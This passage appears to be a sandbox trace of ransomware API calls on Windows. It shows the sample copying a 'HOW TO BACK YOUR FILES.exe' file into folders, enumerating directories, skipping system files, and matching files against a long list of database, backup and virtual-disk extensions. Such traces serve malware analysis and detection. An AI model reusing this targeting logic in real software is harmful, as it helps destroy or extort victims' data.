Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" [0078.159] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.159] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.159] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.159] GetLastError () returned 0x20 [0078.159] Sleep (dwMilliseconds=0xc8) [0078.353] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0078.353] GetLastError () returned 0x0 [0078.354] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.354] CloseHandle (hObject=0x15c) returned 1 [0078.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.354] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.354] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.354] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.354] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.354] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.354] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.354] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.354] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.354] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.355] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.355] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="aoldtz.exe") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2=".") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="..") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="windows") returned -1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="bootmgr") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="temp") returned -1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="pagefile.sys") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="boot") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="ids.txt") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="ntuser.dat") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="perflogs") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2="MSBuild") returned 1 [0078.355] lstrlenW (lpString="Proof.cab") returned 9 [0078.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned 73 [0078.355] lstrcmpiW (lpString1="oof.cab", lpString2="Ares865") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2=".dll") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2=".lnk") returned 1 [0078.355] lstrcmpiW (lpString1="Proof.cab", lpString2=".ini") returned 1 [0078.356] lstrcmpiW (lpString1="Proof.cab", lpString2=".sys") returned 1 [0078.356] lstrlenW (lpString="Proof.cab") returned 9 [0078.356] lstrlenW (lpString="bak") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0078.356] lstrlenW (lpString="ba_") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0078.356] lstrlenW (lpString="dbb") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0078.356] lstrlenW (lpString="vmdk") returned 4 [0078.356] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0078.356] lstrlenW (lpString="rar") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0078.356] lstrlenW (lpString="zip") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0078.356] lstrlenW (lpString="tgz") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0078.356] lstrlenW (lpString="vbox") returned 4 [0078.356] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0078.356] lstrlenW (lpString="vdi") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0078.356] lstrlenW (lpString="vhd") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0078.356] lstrlenW (lpString="vhdx") returned 4 [0078.356] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0078.356] lstrlenW (lpString="avhd") returned 4 [0078.356] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0078.356] lstrlenW (lpString="db") returned 2 [0078.356] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0078.356] lstrlenW (lpString="db2") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0078.356] lstrlenW (lpString="db3") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0078.356] lstrlenW (lpString="dbf") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0078.356] lstrlenW (lpString="mdf") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0078.356] lstrlenW (lpString="mdb") returned 3 [0078.356] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0078.357] lstrlenW (lpString="sql") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0078.357] lstrlenW (lpString="sqlite") returned 6 [0078.357] lstrcmpiW (lpString1="of.cab", lpString2="sqlite") returned -1 [0078.357] lstrlenW (lpString="sqlite3") returned 7 [0078.357] lstrcmpiW (lpString1="oof.cab", lpString2="sqlite3") returned -1 [0078.357] lstrlenW (lpString="sqlitedb") returned 8 [0078.357] lstrcmpiW (lpString1="roof.cab", lpString2="sqlitedb") returned -1 [0078.357] lstrlenW (lpString="xml") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0078.357] lstrlenW (lpString="$er") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0078.357] lstrlenW (lpString="4dd") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0078.357] lstrlenW (lpString="4dl") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0078.357] lstrlenW (lpString="^^^") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0078.357] lstrlenW (lpString="abs") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0078.357] lstrlenW (lpString="abx") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0078.357] lstrlenW (lpString="accdb") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accdb") returned 1 [0078.357] lstrlenW (lpString="accdc") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accdc") returned 1 [0078.357] lstrlenW (lpString="accde") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accde") returned 1 [0078.357] lstrlenW (lpString="accdr") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accdr") returned 1 [0078.357] lstrlenW (lpString="accdt") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accdt") returned 1 [0078.357] lstrlenW (lpString="accdw") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accdw") returned 1 [0078.357] lstrlenW (lpString="accft") returned 5 [0078.357] lstrcmpiW (lpString1="f.cab", lpString2="accft") returned 1 [0078.357] lstrlenW (lpString="adb") returned 3 [0078.357] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0078.358] lstrlenW (lpString="adb") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0078.358] lstrlenW (lpString="ade") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0078.358] lstrlenW (lpString="adf") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0078.358] lstrlenW (lpString="adn") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0078.358] lstrlenW (lpString="adp") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0078.358] lstrlenW (lpString="alf") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0078.358] lstrlenW (lpString="ask") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0078.358] lstrlenW (lpString="btr") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0078.358] lstrlenW (lpString="cat") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0078.358] lstrlenW (lpString="cdb") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0078.358] lstrlenW (lpString="ckp") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0078.358] lstrlenW (lpString="cma") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0078.358] lstrlenW (lpString="cpd") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0078.358] lstrlenW (lpString="dacpac") returned 6 [0078.358] lstrcmpiW (lpString1="of.cab", lpString2="dacpac") returned 1 [0078.358] lstrlenW (lpString="dad") returned 3 [0078.358] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0078.358] lstrlenW (lpString="dadiagrams") returned 10 [0078.358] lstrlenW (lpString="daschema") returned 8 [0078.358] lstrcmpiW (lpString1="roof.cab", lpString2="daschema") returned 1 [0078.358] lstrlenW (lpString="db-journal") returned 10 [0078.358] lstrlenW (lpString="db-shm") returned 6 [0078.358] lstrcmpiW (lpString1="of.cab", lpString2="db-shm") returned 1 [0078.358] lstrlenW (lpString="db-wal") returned 6 [0078.359] lstrcmpiW (lpString1="of.cab", lpString2="db-wal") returned 1 [0078.359] lstrlenW (lpString="dbc") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0078.359] lstrlenW (lpString="dbs") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0078.359] lstrlenW (lpString="dbt") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0078.359] lstrlenW (lpString="dbv") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0078.359] lstrlenW (lpString="dbx") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0078.359] lstrlenW (lpString="dcb") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0078.359] lstrlenW (lpString="dct") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0078.359] lstrlenW (lpString="dcx") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0078.359] lstrlenW (lpString="ddl") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0078.359] lstrlenW (lpString="dlis") returned 4 [0078.359] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0078.359] lstrlenW (lpString="dp1") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0078.359] lstrlenW (lpString="dqy") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0078.359] lstrlenW (lpString="dsk") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0078.359] lstrlenW (lpString="dsn") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0078.359] lstrlenW (lpString="dtsx") returned 4 [0078.359] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0078.359] lstrlenW (lpString="dxl") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0078.359] lstrlenW (lpString="eco") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0078.359] lstrlenW (lpString="ecx") returned 3 [0078.359] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0078.359] lstrlenW (lpString="edb") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0078.360] lstrlenW (lpString="epim") returned 4 [0078.360] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0078.360] lstrlenW (lpString="fcd") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0078.360] lstrlenW (lpString="fdb") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0078.360] lstrlenW (lpString="fic") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0078.360] lstrlenW (lpString="flexolibrary") returned 12 [0078.360] lstrlenW (lpString="fm5") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0078.360] lstrlenW (lpString="fmp") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0078.360] lstrlenW (lpString="fmp12") returned 5 [0078.360] lstrcmpiW (lpString1="f.cab", lpString2="fmp12") returned -1 [0078.360] lstrlenW (lpString="fmpsl") returned 5 [0078.360] lstrcmpiW (lpString1="f.cab", lpString2="fmpsl") returned -1 [0078.360] lstrlenW (lpString="fol") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0078.360] lstrlenW (lpString="fp3") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0078.360] lstrlenW (lpString="fp4") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0078.360] lstrlenW (lpString="fp5") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0078.360] lstrlenW (lpString="fp7") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0078.360] lstrlenW (lpString="fpt") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0078.360] lstrlenW (lpString="frm") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0078.360] lstrlenW (lpString="gdb") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0078.360] lstrlenW (lpString="gdb") returned 3 [0078.360] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0078.360] lstrlenW (lpString="grdb") returned 4 [0078.360] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0078.361] lstrlenW (lpString="gwi") returned 3 [0078.361] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0078.361] lstrlenW (lpString="hdb") returned 3 [0078.361] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0078.361] lstrlenW (lpString="his") returned 3 [0078.361] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0078.361] lstrlenW (lpString="ib") returned 2 [0078.361] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0078.361] lstrlenW (lpString="idb") returned 3 [0078.361] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0078.361] lstrlenW (lpString="ihx") returned 3 [0078.361] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0078.362] lstrlenW (lpString="itdb") returned 4 [0078.362] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0078.362] lstrlenW (lpString="itw") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0078.362] lstrlenW (lpString="jet") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0078.362] lstrlenW (lpString="jtx") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0078.362] lstrlenW (lpString="kdb") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0078.362] lstrlenW (lpString="kexi") returned 4 [0078.362] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0078.362] lstrlenW (lpString="kexic") returned 5 [0078.362] lstrcmpiW (lpString1="f.cab", lpString2="kexic") returned -1 [0078.362] lstrlenW (lpString="kexis") returned 5 [0078.362] lstrcmpiW (lpString1="f.cab", lpString2="kexis") returned -1 [0078.362] lstrlenW (lpString="lgc") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0078.362] lstrlenW (lpString="lwx") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0078.362] lstrlenW (lpString="maf") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0078.362] lstrlenW (lpString="maq") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0078.362] lstrlenW (lpString="mar") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0078.362] lstrlenW (lpString="marshal") returned 7 [0078.362] lstrcmpiW (lpString1="oof.cab", lpString2="marshal") returned 1 [0078.362] lstrlenW (lpString="mas") returned 3 [0078.362] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0078.363] lstrlenW (lpString="mav") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0078.363] lstrlenW (lpString="maw") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0078.363] lstrlenW (lpString="mdbhtml") returned 7 [0078.363] lstrcmpiW (lpString1="oof.cab", lpString2="mdbhtml") returned 1 [0078.363] lstrlenW (lpString="mdn") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0078.363] lstrlenW (lpString="mdt") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0078.363] lstrlenW (lpString="mfd") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0078.363] lstrlenW (lpString="mpd") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0078.363] lstrlenW (lpString="mrg") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0078.363] lstrlenW (lpString="mud") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0078.363] lstrlenW (lpString="mwb") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0078.363] lstrlenW (lpString="myd") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0078.363] lstrlenW (lpString="ndf") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0078.363] lstrlenW (lpString="nnt") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0078.363] lstrlenW (lpString="nrmlib") returned 6 [0078.363] lstrcmpiW (lpString1="of.cab", lpString2="nrmlib") returned 1 [0078.363] lstrlenW (lpString="ns2") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0078.363] lstrlenW (lpString="ns3") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0078.363] lstrlenW (lpString="ns4") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0078.363] lstrlenW (lpString="nsf") returned 3 [0078.363] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0078.363] lstrlenW (lpString="nv") returned 2 [0078.363] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0078.364] lstrlenW (lpString="nv2") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0078.364] lstrlenW (lpString="nwdb") returned 4 [0078.364] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0078.364] lstrlenW (lpString="nyf") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0078.364] lstrlenW (lpString="odb") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0078.364] lstrlenW (lpString="odb") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0078.364] lstrlenW (lpString="oqy") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0078.364] lstrlenW (lpString="ora") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0078.364] lstrlenW (lpString="orx") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0078.364] lstrlenW (lpString="owc") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0078.364] lstrlenW (lpString="p96") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0078.364] lstrlenW (lpString="p97") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0078.364] lstrlenW (lpString="pan") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0078.364] lstrlenW (lpString="pdb") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0078.364] lstrlenW (lpString="pdm") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0078.364] lstrlenW (lpString="pnz") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0078.364] lstrlenW (lpString="qry") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0078.364] lstrlenW (lpString="qvd") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0078.364] lstrlenW (lpString="rbf") returned 3 [0078.364] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0078.364] lstrlenW (lpString="rctd") returned 4 [0078.364] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0078.365] lstrlenW (lpString="rod") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0078.365] lstrlenW (lpString="rodx") returned 4 [0078.365] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0078.365] lstrlenW (lpString="rpd") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0078.365] lstrlenW (lpString="rsd") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0078.365] lstrlenW (lpString="sas7bdat") returned 8 [0078.365] lstrcmpiW (lpString1="roof.cab", lpString2="sas7bdat") returned -1 [0078.365] lstrlenW (lpString="sbf") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0078.365] lstrlenW (lpString="scx") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0078.365] lstrlenW (lpString="sdb") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0078.365] lstrlenW (lpString="sdc") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0078.365] lstrlenW (lpString="sdf") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0078.365] lstrlenW (lpString="sis") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0078.365] lstrlenW (lpString="spq") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0078.365] lstrlenW (lpString="te") returned 2 [0078.365] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0078.365] lstrlenW (lpString="teacher") returned 7 [0078.365] lstrcmpiW (lpString1="oof.cab", lpString2="teacher") returned -1 [0078.365] lstrlenW (lpString="tmd") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0078.365] lstrlenW (lpString="tps") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0078.365] lstrlenW (lpString="trc") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0078.365] lstrlenW (lpString="trc") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0078.365] lstrlenW (lpString="trm") returned 3 [0078.365] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0078.366] lstrlenW (lpString="udb") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0078.366] lstrlenW (lpString="udl") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0078.366] lstrlenW (lpString="usr") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0078.366] lstrlenW (lpString="v12") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0078.366] lstrlenW (lpString="vis") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0078.366] lstrlenW (lpString="vpd") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0078.366] lstrlenW (lpString="vvv") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0078.366] lstrlenW (lpString="wdb") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0078.366] lstrlenW (lpString="wmdb") returned 4 [0078.366] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0078.366] lstrlenW (lpString="wrk") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0078.366] lstrlenW (lpString="xdb") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0078.366] lstrlenW (lpString="xld") returned 3 [0078.366] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0078.366] lstrlenW (lpString="xmlff") returned 5 [0078.366] lstrcmpiW (lpString1="f.cab", lpString2="xmlff") returned -1 [0078.366] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, 